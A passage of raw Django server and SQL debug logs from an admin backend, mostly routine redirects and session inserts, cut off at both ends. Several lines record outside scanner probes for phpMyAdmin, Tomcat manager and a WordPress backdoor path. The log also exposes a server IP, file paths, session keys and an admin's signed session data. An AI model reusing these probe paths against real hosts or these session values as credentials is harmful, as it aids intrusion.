HTTP/1.0" 302 0 [01/Dec/2019 20:32:56] "GET / HTTP/1.0" 302 0 [01/Dec/2019 20:38:02] "GET / HTTP/1.0" 302 0 [01/Dec/2019 20:43:07] "GET / HTTP/1.0" 302 0 [01/Dec/2019 20:48:15] "GET / HTTP/1.0" 302 0 [01/Dec/2019 20:53:18] "GET / HTTP/1.0" 302 0 [01/Dec/2019 20:58:25] "GET / HTTP/1.0" 302 0 [01/Dec/2019 21:03:30] "GET / HTTP/1.0" 302 0 [01/Dec/2019 21:08:36] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [01/Dec/2019 21:10:47] "GET /robots.txt HTTP/1.0" 404 6406 [01/Dec/2019 21:11:02] "GET / HTTP/1.0" 302 0 [01/Dec/2019 21:13:52] "GET / HTTP/1.0" 302 0 [01/Dec/2019 21:18:59] "GET / HTTP/1.0" 302 0 [01/Dec/2019 21:24:05] "GET / HTTP/1.0" 302 0 [01/Dec/2019 21:29:10] "GET / HTTP/1.0" 302 0 [01/Dec/2019 21:34:15] "GET / HTTP/1.0" 302 0 [01/Dec/2019 21:39:17] "GET / HTTP/1.0" 302 0 [01/Dec/2019 21:44:28] "GET / HTTP/1.0" 302 0 [01/Dec/2019 21:49:33] "GET / HTTP/1.0" 302 0 [01/Dec/2019 21:54:14] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-01 21:54:15,008 utils 26999 140702605727488 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'm47e57jct4g3fvy9ucgrdp90igo733i8' LIMIT 1; args=('m47e57jct4g3fvy9ucgrdp90igo733i8',) DEBUG 2019-12-01 21:54:15,011 utils 26999 140702605727488 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('m47e57jct4g3fvy9ucgrdp90igo733i8', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-15T21:54:15.009474+00:00'::timestamptz); args=('m47e57jct4g3fvy9ucgrdp90igo733i8', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 15, 21, 54, 15, 9474, tzinfo=)) [01/Dec/2019 21:54:15] "GET /login/?next=/ HTTP/1.0" 200 1786 [01/Dec/2019 21:54:38] "GET / HTTP/1.0" 302 0 [01/Dec/2019 21:59:46] "GET / HTTP/1.0" 302 0 [01/Dec/2019 22:04:49] "GET / HTTP/1.0" 302 0 [01/Dec/2019 22:09:53] "GET / HTTP/1.0" 302 0 [01/Dec/2019 22:15:06] "GET / HTTP/1.0" 302 0 [01/Dec/2019 22:20:11] "GET / HTTP/1.0" 302 0 [01/Dec/2019 22:25:19] "GET / HTTP/1.0" 302 0 [01/Dec/2019 22:30:24] "GET / HTTP/1.0" 302 0 [01/Dec/2019 22:35:32] "GET / HTTP/1.0" 302 0 [01/Dec/2019 22:40:37] "GET / HTTP/1.0" 302 0 [01/Dec/2019 22:45:42] "GET / HTTP/1.0" 302 0 [01/Dec/2019 22:50:49] "GET / HTTP/1.0" 302 0 [01/Dec/2019 22:55:55] "GET / HTTP/1.0" 302 0 [01/Dec/2019 23:01:01] "GET / HTTP/1.0" 302 0 [01/Dec/2019 23:06:05] "GET / HTTP/1.0" 302 0 [01/Dec/2019 23:11:15] "GET / HTTP/1.0" 302 0 [01/Dec/2019 23:16:16] "GET / HTTP/1.0" 302 0 [01/Dec/2019 23:21:27] "GET / HTTP/1.0" 302 0 [01/Dec/2019 23:26:31] "GET / HTTP/1.0" 302 0 [01/Dec/2019 23:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [01/Dec/2019 23:31:37] "GET / HTTP/1.0" 302 0 Not Found: /index.php [01/Dec/2019 23:33:32] "GET /index.php HTTP/1.0" 404 6402 Not Found: /phpmyadmin/index.php [01/Dec/2019 23:33:32] "GET /phpmyadmin/index.php HTTP/1.0" 404 6435 [01/Dec/2019 23:36:45] "GET / HTTP/1.0" 302 0 [01/Dec/2019 23:41:50] "GET / HTTP/1.0" 302 0 Not Found: /manager/html [01/Dec/2019 23:43:02] "GET /manager/html HTTP/1.0" 404 6411 [01/Dec/2019 23:46:57] "GET / HTTP/1.0" 302 0 [01/Dec/2019 23:52:02] "GET / HTTP/1.0" 302 0 [01/Dec/2019 23:57:09] "GET / HTTP/1.0" 302 0 [02/Dec/2019 00:01:25] "OPTIONS / HTTP/1.0" 302 0 [02/Dec/2019 00:02:12] "GET / HTTP/1.0" 302 0 [02/Dec/2019 00:07:19] "GET / HTTP/1.0" 302 0 [02/Dec/2019 00:12:27] "GET / HTTP/1.0" 302 0 [02/Dec/2019 00:17:30] "GET / HTTP/1.0" 302 0 [02/Dec/2019 00:22:39] "GET / HTTP/1.0" 302 0 [02/Dec/2019 00:27:42] "GET / HTTP/1.0" 302 0 [02/Dec/2019 00:32:51] "GET / HTTP/1.0" 302 0 [02/Dec/2019 00:37:57] "GET / HTTP/1.0" 302 0 [02/Dec/2019 00:43:02] "GET / HTTP/1.0" 302 0 [02/Dec/2019 00:48:03] "GET / HTTP/1.0" 302 0 [02/Dec/2019 00:49:44] "GET / HTTP/1.0" 302 0 [02/Dec/2019 00:53:13] "GET / HTTP/1.0" 302 0 [02/Dec/2019 00:54:14] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-02 00:54:15,373 utils 26999 140702605727488 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'toa6k18mct1vjdjur7jff3c6uapbx6t1' LIMIT 1; args=('toa6k18mct1vjdjur7jff3c6uapbx6t1',) DEBUG 2019-12-02 00:54:15,375 utils 26999 140702605727488 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('toa6k18mct1vjdjur7jff3c6uapbx6t1', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-16T00:54:15.374256+00:00'::timestamptz); args=('toa6k18mct1vjdjur7jff3c6uapbx6t1', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 16, 0, 54, 15, 374256, tzinfo=)) [02/Dec/2019 00:54:15] "GET /login/?next=/ HTTP/1.0" 200 1786 [02/Dec/2019 00:58:19] "GET / HTTP/1.0" 302 0 [02/Dec/2019 01:03:24] "GET / HTTP/1.0" 302 0 [02/Dec/2019 01:08:30] "GET / HTTP/1.0" 302 0 [02/Dec/2019 01:13:35] "GET / HTTP/1.0" 302 0 [02/Dec/2019 01:14:02] "GET / HTTP/1.0" 302 0 [02/Dec/2019 01:18:42] "GET / HTTP/1.0" 302 0 [02/Dec/2019 01:23:46] "GET / HTTP/1.0" 302 0 [02/Dec/2019 01:28:51] "GET / HTTP/1.0" 302 0 [02/Dec/2019 01:33:57] "GET / HTTP/1.0" 302 0 [02/Dec/2019 01:39:00] "GET / HTTP/1.0" 302 0 [02/Dec/2019 01:44:09] "GET / HTTP/1.0" 302 0 [02/Dec/2019 01:49:14] "GET / HTTP/1.0" 302 0 [02/Dec/2019 01:54:20] "GET / HTTP/1.0" 302 0 [02/Dec/2019 01:59:26] "GET / HTTP/1.0" 302 0 [02/Dec/2019 02:04:31] "GET / HTTP/1.0" 302 0 [02/Dec/2019 02:09:39] "GET / HTTP/1.0" 302 0 Not Found: /wp-load.php [02/Dec/2019 02:13:51] "GET /wp-load.php?up2018info=f HTTP/1.0" 404 6422 [02/Dec/2019 02:14:40] "GET / HTTP/1.0" 302 0 [02/Dec/2019 02:19:53] "GET / HTTP/1.0" 302 0 [02/Dec/2019 02:24:56] "GET / HTTP/1.0" 302 0 [02/Dec/2019 02:31:36] "GET / HTTP/1.0" 302 0 [02/Dec/2019 02:35:13] "GET / HTTP/1.0" 302 0 [02/Dec/2019 02:40:23] "GET / HTTP/1.0" 302 0 [02/Dec/2019 02:45:39] "GET / HTTP/1.0" 302 0 [02/Dec/2019 02:50:56] "GET / HTTP/1.0" 302 0 [02/Dec/2019 02:56:09] "GET / HTTP/1.0" 302 0 [02/Dec/2019 03:01:29] "GET / HTTP/1.0" 302 0 [02/Dec/2019 03:06:38] "GET / HTTP/1.0" 302 0 [02/Dec/2019 03:11:53] "GET / HTTP/1.0" 302 0 [02/Dec/2019 03:17:14] "GET / HTTP/1.0" 302 0 [02/Dec/2019 03:18:00] "GET / HTTP/1.0" 302 0 [02/Dec/2019 03:21:29] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-02 03:21:29,285 utils 26999 140702605727488 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'wdhtwxvelp3n2xl77pltcxhsu70br2c3' LIMIT 1; args=('wdhtwxvelp3n2xl77pltcxhsu70br2c3',) DEBUG 2019-12-02 03:21:29,287 utils 26999 140702605727488 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('wdhtwxvelp3n2xl77pltcxhsu70br2c3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-16T03:21:29.285964+00:00'::timestamptz); args=('wdhtwxvelp3n2xl77pltcxhsu70br2c3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 16, 3, 21, 29, 285964, tzinfo=)) [02/Dec/2019 03:21:29] "GET /login/?next=/ HTTP/1.0" 200 1786 [02/Dec/2019 03:22:20] "GET / HTTP/1.0" 302 0 [02/Dec/2019 03:27:27] "GET / HTTP/1.0" 302 0 [02/Dec/2019 03:32:33] "GET / HTTP/1.0" 302 0 [02/Dec/2019 03:33:43] "GET / HTTP/1.0" 302 0 [02/Dec/2019 03:37:40] "GET / HTTP/1.0" 302 0 [02/Dec/2019 03:42:42] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [02/Dec/2019 03:47:07] "GET /robots.txt HTTP/1.0" 404 6406 [02/Dec/2019 03:47:11] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-02 03:47:15,196 utils 26999 140702605727488 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '6db9jpua773nfpn8aj6y2fzvfqw7ognl' LIMIT 1; args=('6db9jpua773nfpn8aj6y2fzvfqw7ognl',) DEBUG 2019-12-02 03:47:15,199 utils 26999 140702605727488 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('6db9jpua773nfpn8aj6y2fzvfqw7ognl', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-16T03:47:15.197416+00:00'::timestamptz); args=('6db9jpua773nfpn8aj6y2fzvfqw7ognl', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 16, 3, 47, 15, 197416, tzinfo=)) [02/Dec/2019 03:47:15] "GET /login/?next=/ HTTP/1.0" 200 1786 [02/Dec/2019 03:47:53] "GET / HTTP/1.0" 302 0 [02/Dec/2019 03:53:00] "GET / HTTP/1.0" 302 0 [02/Dec/2019 03:54:14] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-02 03:54:15,089 utils 26999 140702605727488 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'yx97b2ie2jnjmj1hsk60ise0sw2lov8l' LIMIT 1; args=('yx97b2ie2jnjmj1hsk60ise0sw2lov8l',) DEBUG 2019-12-02 03:54:15,091 utils 26999 140702605727488 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('yx97b2ie2jnjmj1hsk60ise0sw2lov8l', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-16T03:54:15.089737+00:00'::timestamptz); args=('yx97b2ie2jnjmj1hsk60ise0sw2lov8l', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 16, 3, 54, 15, 89737, tzinfo=)) [02/Dec/2019 03:54:15] "GET /login/?next=/ HTTP/1.0" 200 1786 [02/Dec/2019 03:58:07] "GET / HTTP/1.0" 302 0 [02/Dec/2019 04:03:08] "GET / HTTP/1.0" 302 0 [02/Dec/2019 04:08:18] "GET / HTTP/1.0" 302 0 [02/Dec/2019 04:13:25] "GET / HTTP/1.0" 302 0 [02/Dec/2019 04:18:30] "GET / HTTP/1.0" 302 0 [02/Dec/2019 04:23:36] "GET / HTTP/1.0" 302 0 [02/Dec/2019 04:27:55] "GET / HTTP/1.0" 302 0 [02/Dec/2019 04:28:21] "GET / HTTP/1.0" 302 0 [02/Dec/2019 04:28:43] "GET / HTTP/1.0" 302 0 [02/Dec/2019 04:33:46] "GET / HTTP/1.0" 302 0 [02/Dec/2019 04:38:32] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-02 04:38:32,992 utils 26999 140702605727488 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'w240sc5jawyha13tw6s09o9sevdeudtt' LIMIT 1; args=('w240sc5jawyha13tw6s09o9sevdeudtt',) DEBUG 2019-12-02 04:38:32,994 utils 26999 140702605727488 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('w240sc5jawyha13tw6s09o9sevdeudtt', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-16T04:38:32.992704+00:00'::timestamptz); args=('w240sc5jawyha13tw6s09o9sevdeudtt', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 16, 4, 38, 32, 992704, tzinfo=)) [02/Dec/2019 04:38:32] "GET /login/?next=/ HTTP/1.0" 200 1786 [02/Dec/2019 04:38:54] "GET / HTTP/1.0" 302 0 [02/Dec/2019 04:40:23] "GET / HTTP/1.0" 302 0 [02/Dec/2019 04:44:00] "GET / HTTP/1.0" 302 0 [02/Dec/2019 04:49:05] "GET / HTTP/1.0" 302 0 Not Found: /index.asp [02/Dec/2019 04:53:05] "GET /index.asp HTTP/1.0" 404 6403 [02/Dec/2019 04:54:10] "GET / HTTP/1.0" 302 0 [02/Dec/2019 04:56:55] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-02 04:56:57,333 utils 26999 140702605727488 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'q9tcl8cokixuh7l0m1fsix01kd0u8jog' LIMIT 1; args=('q9tcl8cokixuh7l0m1fsix01kd0u8jog',) DEBUG 2019-12-02 04:56:57,335 utils 26999 140702605727488 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('q9tcl8cokixuh7l0m1fsix01kd0u8jog', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-16T04:56:57.333946+00:00'::timestamptz); args=('q9tcl8cokixuh7l0m1fsix01kd0u8jog', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 16, 4, 56, 57, 333946, tzinfo=)) [02/Dec/2019 04:56:57] "GET /login/?next=/ HTTP/1.0" 200 1786 [02/Dec/2019 04:59:14] "GET / HTTP/1.0" 302 0 [02/Dec/2019 05:04:20] "GET / HTTP/1.0" 302 0 [02/Dec/2019 05:09:26] "GET / HTTP/1.0" 302 0 [02/Dec/2019 05:14:27] "GET / HTTP/1.0" 302 0 [02/Dec/2019 05:19:37] "GET / HTTP/1.0" 302 0 [02/Dec/2019 05:24:39] "GET / HTTP/1.0" 302 0 [02/Dec/2019 05:29:47] "GET / HTTP/1.0" 302 0 [02/Dec/2019 05:34:52] "GET / HTTP/1.0" 302 0 [02/Dec/2019 05:35:23] "GET / HTTP/1.0" 302 0 [02/Dec/2019 05:39:56] "GET / HTTP/1.0" 302 0 [02/Dec/2019 05:45:00] "GET / HTTP/1.0" 302 0 [02/Dec/2019 05:50:06] "GET / HTTP/1.0" 302 0 [02/Dec/2019 05:55:12] "GET / HTTP/1.0" 302 0 [02/Dec/2019 05:56:54] "GET / HTTP/1.0" 302 0 [02/Dec/2019 06:00:17] "GET / HTTP/1.0" 302 0 [02/Dec/2019 06:05:22] "GET / HTTP/1.0" 302 0 [02/Dec/2019 06:10:24] "GET / HTTP/1.0" 302 0 Not Found: /images.php [02/Dec/2019 06:14:40] "POST /images.php HTTP/1.0" 404 6406 [02/Dec/2019 06:15:33] "GET / HTTP/1.0" 302 0 [02/Dec/2019 06:20:38] "GET / HTTP/1.0" 302 0 [02/Dec/2019 06:25:42] "GET / HTTP/1.0" 302 0 Not Found: /auth1.html [02/Dec/2019 06:26:37] "GET /auth1.html HTTP/1.0" 404 6405 [02/Dec/2019 06:30:50] "GET / HTTP/1.0" 302 0 [02/Dec/2019 06:35:56] "GET / HTTP/1.0" 302 0 [02/Dec/2019 06:41:01] "GET / HTTP/1.0" 302 0 [02/Dec/2019 06:46:06] "GET / HTTP/1.0" 302 0 [02/Dec/2019 06:51:14] "GET / HTTP/1.0" 302 0 [02/Dec/2019 06:54:15] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-02 06:54:17,001 utils 26999 140702605727488 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'x42kickhhzvyp8ntymfmptmiq8lm2xdk' LIMIT 1; args=('x42kickhhzvyp8ntymfmptmiq8lm2xdk',) DEBUG 2019-12-02 06:54:17,003 utils 26999 140702605727488 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('x42kickhhzvyp8ntymfmptmiq8lm2xdk', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-16T06:54:17.002151+00:00'::timestamptz); args=('x42kickhhzvyp8ntymfmptmiq8lm2xdk', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 16, 6, 54, 17, 2151, tzinfo=)) [02/Dec/2019 06:54:17] "GET /login/?next=/ HTTP/1.0" 200 1786 [02/Dec/2019 06:56:15] "GET / HTTP/1.0" 302 0 [02/Dec/2019 07:01:24] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 70.32.81.181/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [02/Dec/2019 07:04:29] "POST /editBlackAndWhiteList HTTP/1.0" 500 65627 [02/Dec/2019 07:06:28] "GET / HTTP/1.0" 302 0 [02/Dec/2019 07:11:34] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-02 07:15:03,737 utils 26999 140702605727488 (0.011) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-02T07:15:03.719743+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 2, 7, 15, 3, 719743, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-02 07:15:03,747 utils 26999 140702605727488 (0.006) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-02 07:15:03,791 utils 26999 140702605727488 (0.011) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-02 07:15:03,797 utils 26999 140702605727488 (0.003) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-16T07:15:03.793099+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 16, 7, 15, 3, 793099, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [02/Dec/2019 07:15:03] "GET / HTTP/1.0" 200 6019 Not Found: /robots.txt [02/Dec/2019 07:15:04] "GET /robots.txt HTTP/1.0" 404 6408 [02/Dec/2019 07:15:04] "GET /static/admin/css/base.css HTTP/1.0" 304 0 [02/Dec/2019 07:15:04] "GET /static/admin/css/dashboard.css HTTP/1.0" 304 0 [02/Dec/2019 07:15:04] "GET /static/admin/css/responsive.css HTTP/1.0" 304 0 DEBUG 2019-12-02 07:15:12,366 utils 26999 140702605727488 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-02T07:15:12.357323+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 2, 7, 15, 12, 357323, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-02 07:15:12,368 utils 26999 140702605727488 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-02 07:15:12,398 utils 26999 140702605727488 (0.002) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-02 07:15:12,401 utils 26999 140702605727488 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-16T07:15:12.400106+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 16, 7, 15, 12, 400106, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [02/Dec/2019 07:15:12] "GET / HTTP/1.0" 200 6019 [02/Dec/2019 07:15:12] "GET /static/admin/css/fonts.css HTTP/1.0" 304 0 [02/Dec/2019 07:15:12] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 304 0 [02/Dec/2019 07:15:13] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 304 0 [02/Dec/2019 07:15:13] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 304 0 [02/Dec/2019 07:15:13] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 304 0 [02/Dec/2019 07:15:13] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 304 0 Not Found: /favicon.ico [02/Dec/2019 07:15:13] "GET /favicon.ico HTTP/1.0" 404 6411 [02/Dec/2019 07:16:41] "GET / HTTP/1.0" 302 0 [02/Dec/2019 07:21:45] "GET / HTTP/1.0" 302 0 [02/Dec/2019 07:26:50] "GET / HTTP/1.0" 302 0 [02/Dec/2019 07:31:56] "GET / HTTP/1.0" 302 0 [02/Dec/2019 07:36:59] "GET / HTTP/1.0" 302 0 Not Found: /.well-known/pki-validation/98AE8BFA100052A045E2C4787F8F1953.txt [02/Dec/2019 07:40:02] "GET /.well-known/pki-validation/98AE8BFA100052A045E2C4787F8F1953.txt HTTP/1.0" 404 6567 Not Found: /.well-known/pki-validation/F30340F14764B10D3307A68103BEDC27.txt [02/Dec/2019 07:40:05] "GET /.well-known/pki-validation/F30340F14764B10D3307A68103BEDC27.txt HTTP/1.0" 404 6571 [02/Dec/2019 07:42:06] "GET / HTTP/1.0" 302 0 [02/Dec/2019 07:47:12] "GET / HTTP/1.0" 302 0 [02/Dec/2019 07:52:16] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [02/Dec/2019 07:53:46] "GET /proxy.php HTTP/1.0" 404 6411 [02/Dec/2019 07:57:18] "GET / HTTP/1.0" 302 0 [02/Dec/2019 08:02:20] "GET / HTTP/1.0" 302 0 [02/Dec/2019 08:05:02] "GET /whm-server-status HTTP/1.0" 301 0 [02/Dec/2019 08:07:29] "GET / HTTP/1.0" 302 0 [02/Dec/2019 08:12:38] "GET / HTTP/1.0" 302 0 [02/Dec/2019 08:17:43] "GET / HTTP/1.0" 302 0 [02/Dec/2019 08:22:49] "GET / HTTP/1.0" 302 0 [02/Dec/2019 08:27:54] "GET / HTTP/1.0" 302 0 [02/Dec/2019 08:33:01] "GET / HTTP/1.0" 302 0 [02/Dec/2019 08:38:08] "GET / HTTP/1.0" 302 0 [02/Dec/2019 08:39:19] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-02 08:39:19,247 utils 26999 140702605727488 (0.002) SELECT (1) AS 